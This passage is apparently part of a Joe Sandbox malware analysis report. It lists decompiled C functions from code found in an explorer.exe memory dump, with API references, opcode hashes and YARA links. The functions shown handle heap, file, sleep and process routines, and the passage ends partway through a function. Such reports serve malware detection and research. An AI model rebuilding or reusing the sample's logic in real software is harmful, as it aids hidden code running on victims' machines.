                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                  • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B269, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008B269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}



                  0x0008b27c

                  APIs
                  • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                  • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                  • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                  • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}




                  0x000885f8
                  0x000885fe
                  0x00088603

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                  • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119sleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0x40fd20
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0x40fd20
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0x40fd20
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0x40fd20
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0x40fd20
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0); // executed
				}
				return 0;
			}

























                  0x0008f9c5
                  0x0008f9cd
                  0x0008f9d2
                  0x0008f9d8
                  0x0008f9de
                  0x0008f9f1
                  0x0008f9fb
                  0x0008fa05
                  0x0008fa08
                  0x0008fa0d
                  0x0008fa23
                  0x0008fa27
                  0x0008fa2c
                  0x0008fa2d
                  0x0008fa2e
                  0x0008fa33
                  0x0008fa36
                  0x0008fa37
                  0x0008fa38
                  0x0008fa3d
                  0x0008fa4c
                  0x0008fa51
                  0x0008fa56
                  0x0008fa5d
                  0x0008fa66
                  0x0008fa6b
                  0x0008fa6e
                  0x0008fa71
                  0x0008fa76
                  0x0008fa7c
                  0x0008fa81
                  0x0008fa86
                  0x0008fa89
                  0x0008fa9c
                  0x0008faa1
                  0x0008faa4
                  0x0008faa4
                  0x0008faac
                  0x0008fab7
                  0x0008fabc
                  0x0008fabf
                  0x0008fac2
                  0x0008fac2
                  0x0008fac8
                  0x0008faca
                  0x0008face
                  0x0008fad9
                  0x0008fade
                  0x0008fae3
                  0x00000000
                  0x00000000
                  0x0008faec
                  0x0008faf2
                  0x0008faf9
                  0x0008fafb
                  0x0008fafe
                  0x00000000
                  0x0008fafe
                  0x00000000
                  0x0008faf9
                  0x0008fb0b
                  0x0008fb14
                  0x0008fb18

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapSleep
                  • String ID:
                  • API String ID: 4201116106-0
                  • Opcode ID: ca1f85b10fce3d7ab917c7b8650cfc21e56fba2a81fbb79344a5bac3ebb63321
                  • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                  • Opcode Fuzzy Hash: ca1f85b10fce3d7ab917c7b8650cfc21e56fba2a81fbb79344a5bac3ebb63321
                  • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008896F, Relevance: 1.4, APIs: 1, Instructions: 107stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00088604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00088604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E0008861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0x40f8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E0008861A(_t73, 0);
						}
						E0008861A( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E0008861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}
















                  0x00088975
                  0x0008897c
                  0x0008897e
                  0x00088986
                  0x00088988
                  0x00088990
                  0x00088992
                  0x00088995
                  0x00088998
                  0x000889ac
                  0x000889b3
                  0x000889b9
                  0x000889c2
                  0x00088a1a
                  0x00088a1f
                  0x00088a28
                  0x00088a75
                  0x00088a78
                  0x00088a80
                  0x00088a84
                  0x00088a84
                  0x00088a89
                  0x00000000
                  0x00088a89
                  0x00088a2a
                  0x00088a2c
                  0x00088a34
                  0x00088a3a
                  0x00088a3b
                  0x00088a3b
                  0x00088a43
                  0x00088a46
                  0x00088a4b
                  0x00088a4b
                  0x00088a4e
                  0x00088a57
                  0x00088a5c
                  0x00088a62
                  0x00088a69
                  0x00000000
                  0x00088a6f
                  0x000889cb
                  0x000889d0
                  0x000889d2
                  0x000889d9
                  0x00000000
                  0x00000000
                  0x000889ee
                  0x00000000
                  0x000889f0
                  0x000889f0
                  0x000889fb
                  0x000889fe
                  0x00088a0b
                  0x00000000
                  0x00088a11
                  0x000889ee
                  0x0008899a
                  0x00000000

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeaplstrcpyn
                  • String ID:
                  • API String ID: 680773602-0
                  • Opcode ID: 5beacecdb8d78057d78b25741919f4baf88fb2d4c825de191405f0dc12551294
                  • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                  • Opcode Fuzzy Hash: 5beacecdb8d78057d78b25741919f4baf88fb2d4c825de191405f0dc12551294
                  • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E2C6, Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E0008E2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0x40fa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0x40fa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x9e68c; // 0x40fab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E00088604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0x40fab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}





















                  0x0008e2c6
                  0x0008e2d9
                  0x0008e2e0
                  0x0008e2e9
                  0x0008e2f1
                  0x0008e2f7
                  0x0008e2fc
                  0x0008e307
                  0x0008e30c
                  0x0008e3a5
                  0x0008e3a5
                  0x0008e3ad
                  0x00000000
                  0x0008e3b2
                  0x0008e313
                  0x0008e316
                  0x0008e31d
                  0x0008e32d
                  0x0008e333
                  0x0008e343
                  0x0008e348
                  0x0008e34d
                  0x0008e354
                  0x0008e358
                  0x0008e35f
                  0x0008e363
                  0x0008e367
                  0x0008e368
                  0x0008e36b
                  0x0008e370
                  0x0008e379
                  0x0008e385
                  0x0008e38f
                  0x0008e394
                  0x0008e394
                  0x0008e379
                  0x0008e39a
                  0x0008e39b
                  0x00000000
                  0x0008e3a4
                  0x00000000

                  APIs
                  • Sleep.KERNELBASE(0000000A), ref: 0008E394
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                  • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                  • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                  • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A3ED, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}













                  0x0008a3ed
                  0x0008a3f6
                  0x0008a3f8
                  0x0008a3fa
                  0x0008a3fe
                  0x0008a400
                  0x0008a408
                  0x0008a40f
                  0x0008a418
                  0x0008a41d
                  0x0008a422
                  0x0008a446
                  0x0008a44b
                  0x0008a451
                  0x0008a45d
                  0x0008a462
                  0x0008a424
                  0x0008a42d
                  0x0008a443
                  0x00000000
                  0x0008a42f
                  0x0008a43b
                  0x0008a440
                  0x0008a42d
                  0x0008a422
                  0x0008a465
                  0x0008a466
                  0x0008a400
                  0x0008a470

                  APIs
                    • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                  • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ErrorLast
                  • String ID:
                  • API String ID: 1452528299-0
                  • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                  • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                  • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                  • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0x40f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0x40f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















                  0x00085d80
                  0x00085d95
                  0x00085d9e
                  0x00085da7
                  0x00085da9
                  0x00085db1
                  0x00085dc1
                  0x00085dcf
                  0x00085dd4
                  0x00085dd9
                  0x00085ddb
                  0x00085ddd
                  0x00085de2
                  0x00085de4
                  0x00085dff
                  0x00085dff
                  0x00085de6
                  0x00085de7
                  0x00085df2
                  0x00085dfa
                  0x00085dfc
                  0x00085dfc
                  0x00085de4
                  0x00085e01
                  0x00085db3
                  0x00085db4
                  0x00085db9
                  0x00085dbe
                  0x00085dbe
                  0x00085e05

                  APIs
                  • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcmpi
                  • String ID:
                  • API String ID: 1586166983-0
                  • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                  • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0x40fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0x40f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












                  0x0008ba0a
                  0x0008ba12
                  0x0008ba1a
                  0x0008ba1f
                  0x0008ba29
                  0x0008ba32
                  0x0008ba37
                  0x0008ba3c
                  0x0008ba5a
                  0x0008ba5d
                  0x0008ba3e
                  0x0008ba41
                  0x0008ba43
                  0x0008ba4b
                  0x0008ba4b
                  0x0008ba4e
                  0x0008ba4e
                  0x0008ba61
                  0x0008ba22
                  0x0008ba22
                  0x0008ba22

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                  • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085CEC, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t24);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, __fp0);
				_t21 =  *0x9e684; // 0x40f8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}











                  0x00085cec
                  0x00085cec
                  0x00085cef
                  0x00085cfe
                  0x00085d03
                  0x00085d08
                  0x00085d0f
                  0x00085d15
                  0x00085d1b
                  0x00085d21
                  0x00085d26
                  0x00085d2b
                  0x00085d33
                  0x00085d3d
                  0x00085d4b
                  0x00085d53
                  0x00085d5f
                  0x00085d67
                  0x00085d6c
                  0x00085d72
                  0x00085d7c

                  APIs
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                    • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                    • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                    • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                    • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                    • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  • memset.MSVCRT ref: 00085D5F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                  • String ID:
                  • API String ID: 4245722550-0
                  • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                  • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}






                  0x0008861d
                  0x00088622
                  0x00088668
                  0x00088668
                  0x00088625
                  0x00088629
                  0x0008862b
                  0x0008862e
                  0x00088634
                  0x00088642
                  0x00088646
                  0x00088646
                  0x00088636
                  0x00088637
                  0x0008863c
                  0x0008864f
                  0x00088660
                  0x00088660
                  0x00000000

                  APIs
                  • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                  • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
